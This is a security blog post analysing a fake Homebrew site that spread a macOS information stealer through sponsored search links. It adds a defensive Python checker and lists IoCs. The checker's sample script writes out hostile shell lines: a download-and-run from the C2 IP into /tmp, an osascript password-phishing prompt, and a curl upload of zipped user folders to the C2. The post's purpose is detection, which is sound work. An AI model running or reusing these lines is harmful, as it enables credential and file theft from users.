On January 18, 2025, Ryan Chenkie, a web developer and owner of several businesses, warned users on Twitter about a malware campaign that used Google's sponsored links to redirect developers to a malicious clone of the Homebrew website.
The malicious website, brewe[.]sh, deceived its visitors by asking them to run a command, just like the real website does, but the script behind it was modified to first download and execute malware and only then run Homebrew's genuine installation script.
Malware Analysis
Once downloaded to /tmp/, the "update" program displays a dialog asking for the root password, which is then used inside an osascript script. The script steals files, browser cookies and cryptocurrency wallet configurations and sends them to a C2 server.
The browsers covered by the script are Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Chrome Beta, Chrome Canary, Chromium, Chrome Dev, Arc, Coccoc, Waterfox, Pale Moon and Firefox.
The wallets are Electrum, Coinomi, Exodus, Atomic, Wasabi, Ledger_Live, Monero, Bitcoin_Core, Litecoin_Core, Dash_Core, Electrum_LTC, Electron_Cash, Guarda, Dogecoin_Core and Trezor_Suite.
Finally, the script also collects every file from the Desktop, Documents and Downloads folders, together with all passwords stored in the macOS keychain.
It then zips the collected files and sends them to http://81.19.135[.]54/joinsystem with a curl command.
This program is a variant of AmosStealer, a well-known macOS information stealer.
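The two things a defender can check here are the install command a user is about to paste (does it really fetch Homebrew's installer from the official location?) and the script that comes back (does it show the behaviours described above: staging a payload in /tmp, an osascript password prompt, zipping the user's folders, uploading with curl to the C2?). The Python below is an added example written for this post, not code from the post or from Homebrew; the allowlisted host and path for the genuine installer, the indicator regexes and the sample scripts are constructed assumptions, and the only real values are the IoCs the post lists (brewe.sh, norikosumiya.com, 81.19.135.54 and the /joinsystem endpoint).

```python
from __future__ import annotations
import re
from urllib.parse import urlparse

# Assumption: where the genuine Homebrew installer lives (defender-maintained allowlist).
OFFICIAL_INSTALLER_HOSTS = {"raw.githubusercontent.com"}
OFFICIAL_INSTALLER_PATH_PREFIX = "/Homebrew/install/"

# IoCs from the post, with the defanging brackets removed so they match real strings.
KNOWN_BAD_HOSTS = {"brewe.sh", "norikosumiya.com", "81.19.135.54"}

URL_RE = re.compile(r"https?://[^\s\"'()]+")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Behaviours described in the post, matched line by line (label, regex). Constructed heuristics.
SCRIPT_INDICATORS = [
    ("password prompt via osascript", re.compile(r"osascript.*(hidden answer|password)")),
    ("payload staged in /tmp", re.compile(r"/tmp/\S+")),
    ("user folders archived", re.compile(r"\bzip\b.*(Desktop|Documents|Downloads)")),
    ("keychain access", re.compile(r"security\s+(find-generic-password|dump-keychain)|login\.keychain")),
    ("upload via curl", re.compile(r"curl\b.*(-X\s*POST|-F\s|--data|-d\s|-T\s).*https?://")),
]


def check_install_command(cmd: str) -> list[str]:
    """Return findings for a pasted 'bash -c "$(curl ...)"' style install command.
    An empty list means every URL in the command points at the official installer."""
    findings: list[str] = []
    urls = URL_RE.findall(cmd)
    if not urls:
        return ["no URL found in command"]
    for url in urls:
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if host in KNOWN_BAD_HOSTS:
            findings.append(f"known IoC host: {host}")
        elif IPV4_RE.match(host):
            findings.append(f"installer fetched from a raw IP address: {host}")
        elif parsed.scheme != "https":
            findings.append(f"installer fetched over plain HTTP: {url}")
        elif host not in OFFICIAL_INSTALLER_HOSTS or not parsed.path.startswith(OFFICIAL_INSTALLER_PATH_PREFIX):
            findings.append(f"installer host/path is not the official Homebrew location: {url}")
    return findings


def scan_script(text: str) -> dict:
    """Score a downloaded installer script against the behaviours the post describes.
    Returns matched indicator labels, IoC or raw-IP hosts it contacts, and a verdict."""
    indicators = [label for label, rx in SCRIPT_INDICATORS
                  if any(rx.search(line) for line in text.splitlines())]
    hosts = set()
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname or ""
        if host in KNOWN_BAD_HOSTS or IPV4_RE.match(host):
            hosts.add(host)
    verdict = "suspicious" if hosts or len(indicators) >= 2 else "clean"
    return {"indicators": indicators, "ioc_hosts": sorted(hosts), "verdict": verdict}


# Constructed samples: the genuine one-liner, the clone's one-liner, and the *shape* of the
# trojanised script (inert placeholder commands, not the real malware).
OFFICIAL_COMMAND = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
CLONED_COMMAND = '/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"'
BENIGN_SCRIPT = "#!/bin/bash\n" + OFFICIAL_COMMAND + "\n"
SUSPICIOUS_SCRIPT = """#!/bin/bash
curl -s http://81.19.135.54/update -o /tmp/update && chmod +x /tmp/update && /tmp/update
osascript -e 'display dialog "macOS needs your password" default answer "" with hidden answer'
zip -r /tmp/out.zip "$HOME/Desktop" "$HOME/Documents" "$HOME/Downloads"
curl -X POST -F "file=@/tmp/out.zip" http://81.19.135.54/joinsystem
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
"""

if __name__ == "__main__":
    print("official command:", check_install_command(OFFICIAL_COMMAND))
    print("cloned command:  ", check_install_command(CLONED_COMMAND))
    print("benign script:   ", scan_script(BENIGN_SCRIPT))
    print("suspicious script:", scan_script(SUSPICIOUS_SCRIPT))
```

The command check is the cheap pre-paste control (host and path allowlist, no raw IPs, no plain HTTP, known IoCs); the script scan is the second line, and its last sample shows why the lure works: the trojanised script ends by running the real Homebrew installer, so the user sees a normal install and has no reason to suspect the lines that ran before it.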
Another threat?
It is worth mentioning that before the Homebrew impersonation, the same website had already been used for what looks like another malware distribution campaign, under the name Game On, as early as the second of January.
Afterword
Please use an ad blocker, or at least check the URL before clicking a link. Always.
IOCs
448399ac7f194f784a912b8f5af416a6be4be9f479dc99ccc0376e1a56b97017
brewe[.]sh
norikosumiya[.]com
81.19.135[.]54